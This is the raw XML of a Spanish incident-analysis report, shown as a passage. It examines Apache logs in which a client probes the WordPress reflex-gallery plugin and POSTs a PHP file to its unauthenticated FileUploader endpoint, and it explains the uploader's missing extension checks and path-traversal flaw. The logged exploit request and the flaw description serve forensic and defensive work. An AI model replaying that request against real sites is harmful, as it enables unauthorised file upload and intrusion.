xQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAPKfLHckAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:imagedata r:id="rId221" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1196" type="#_x0000_t202" style="position:absolute;left:39974;top:3615;width:13970;height:4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nbCygAAAOEAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwMx&#10;FITvgv8hPMGL2OxqCXVtWkpRUC/FtRdvj83rZnXzsiTZdv33RhB6HGbmG2a5nlwvjhRi51lDOStA&#10;EDfedNxq2H883y5AxIRssPdMGn4ownp1ebHEyvgTv9OxTq3IEI4VarApDZWUsbHkMM78QJy9gw8O&#10;U5ahlSbgKcNdL++KQkmHHecFiwNtLTXf9eg07OafO3szHp7eNvP78Loft+qrrbW+vpo2jyASTekc&#10;/m+/GA2qKJValA/w9yi/Abn6BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHtmdsLKAAAA&#10;4QAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4A36D651" w14:textId="176392EA" w:rsidR="00B20FD9" w:rsidRPr="00EE3377" w:rsidRDefault="00B20FD9" w:rsidP="00B20FD9">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>51</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="131" w:name="_Toc155782618"/>
                        <w:r w:rsidRPr="00DE2791">
                          <w:t>Análisis de Apache access.log.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="131"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB27B6" w:rsidRPr="00A703AB">
        <w:t xml:space="preserve">Cabe destacar de este archivo las siguientes </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00A703AB">
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidR="00BB27B6" w:rsidRPr="00A703AB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF19EC0" w14:textId="058E7839" w:rsidR="00BB27B6" w:rsidRPr="0016269A" w:rsidRDefault="00BB27B6" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>18.195.165.56 - - [03/Jan/2019:07:07:28 +0000] "GET /wp-content/plugins/reflex-gallery/readme.txt HTTP/1.1" 200 8887 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6427C3" w14:textId="482A2442" w:rsidR="00BB27B6" w:rsidRPr="0016269A" w:rsidRDefault="00BB27B6" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>18.195.165.56 - - [03/Jan/2019:07:07:43 +0000] "POST /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2019&amp;Month=01 HTTP/1.1" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A5AC9" w14:textId="693D3C71" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00381329" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ace un </w:t>
      </w:r>
      <w:r w:rsidR="00B9067B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a un readme.txt puede una </w:t>
      </w:r>
      <w:r w:rsidR="00062086" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acción</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de amenaza puesto que se puede obtener información expuesta involuntariamente en dicho archivo, no será la primera vez que se ve en un comentario de una web una contraseña o similar. En el caso que nos ocupa se ha observado que, no hay información sensible al respecto, quizás, lo haya realizado esta </w:t>
      </w:r>
      <w:r w:rsidR="00062086" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acción</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para comprobar alguna vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27836534" w14:textId="74F00D84" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por </w:t>
      </w:r>
      <w:r w:rsidR="00927E54" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>otro</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lado, posteriormente que inyecte un archivo .php dentro de un sistema de carga de imágenes, pues puede ser una vulnerabilidad, ya que se puede estar inyectando código malicioso dentro del sistema. Procedo a la extracción del archivo y análisis con VirusTotal. El resultado muestra que no tiene virus. Aun </w:t>
      </w:r>
      <w:r w:rsidR="00443705" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se hace un resumen del código en busca de posibles vulnerabilidades llegando a las siguientes conclusiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607769BF" w14:textId="7D234B24" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Control de Extensiones de Archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020BD65" w14:textId="32536A0A" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB" w:rsidP="00F84817">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aunque hay una comprobación de las extensiones de archivo permitidas, esta lista está vacía por defecto (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$allowedExtensions = array();</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). Esto podría permitir la carga de tipos de archivos potencialmente peligrosos si no se configura adecuadamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EB2F1" w14:textId="7935BF4C" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manejo de Directorios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3ACEE" w14:textId="35E8CB7D" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB" w:rsidP="00F84817">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El script parece crear y escribir en directorios basados en entradas de usuario (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/'</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Esto podría llevar a vulnerabilidades de recorrido de directorio si no se valida y </w:t>
      </w:r>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>restringe adecuadamente.</w:t>
      </w:r>
      <w:r w:rsidR="00B9067B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tal y como vemos, es lo que ha hecho con </w:t>
      </w:r>
      <w:r w:rsidR="00B20FD9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la segunda línea destacada anteriormente</w:t>
      </w:r>
      <w:r w:rsidR="00B9067B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303DF716" w14:textId="4AB58B41" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Falta de Autenticación y Autorización:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CCB8D" w14:textId="579D90EB" w:rsidR="00A703AB" w:rsidRPr="00F84817" w:rsidRDefault="00A703AB" w:rsidP="00F84817">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F84817">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No hay evidencia de controles de autenticación o autorización para limitar quién puede cargar archivos. Esto puede exponer el sistema a cargas no autorizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6BDC29" w14:textId="539E7E85" w:rsidR="00A703AB" w:rsidRPr="0016269A" w:rsidRDefault="00A703AB" w:rsidP="00062086">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="0016269A">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00062086">
        <w:t>pache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0016269A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00062086">
        <w:t>error.log</w:t>
      </w:r>
      <w:r w:rsidR="0016269A" w:rsidRPr="0016269A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23284CC5" w14:textId="046637EC" w:rsidR="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedemos a abrir el archivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/log/apache2/error.log</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49049C1A" w14:textId="77777777" w:rsidR="00BB27B6" w:rsidRPr="00A703AB" w:rsidRDefault="00BB27B6" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Destacamos las líneas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E58043" w14:textId="77777777" w:rsidR="00BB27B6" w:rsidRPr="00381329" w:rsidRDefault="00BB27B6" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Thu Jan 03 07:07:43.230918 2019] [php7:notice] [pid 19951] [client 18.195.165.56:44145] PHP Notice:  A non well formed numeric value encountered in /var/www/html/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php on line 169</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F767CFC" w14:textId="23FE974F" w:rsidR="00BB27B6" w:rsidRPr="00381329" w:rsidRDefault="009A067C" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251830272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79734A06" wp14:editId="5CFC9C2F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>696300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5397500" cy="1270000"/>
                <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1418924467" name="Grupo 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5397500" cy="1270000"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5397500" cy="1270000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="2051248275" name="Imagen 87"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="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545205" cy="1270000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1828564664" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3657600" y="318977"/>
                            <a:ext cx="1739900" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5C8649AF" w14:textId="6EB83C63" w:rsidR="00B20FD9" w:rsidRPr="001740C6" w:rsidRDefault="00B20FD9" w:rsidP="00B20FD9">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>52</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="132" w:name="_Toc155782619"/>
                              <w:r w:rsidRPr="006E46DF">
                                <w:t>Análisis de Apache error.log.</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734A06" id="Grupo 42" o:spid="_x0000_s1197" style="position:absolute;left:0;text-align:left;margin-left:373.8pt;margin-top:54.85pt;width:425pt;height:100pt;z-index:251830272;mso-position-horizontal:right;mso-position-horizontal-relative:margin" coordsize="53975,12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&#10;db/znLlvZ9nEbm8u8y4v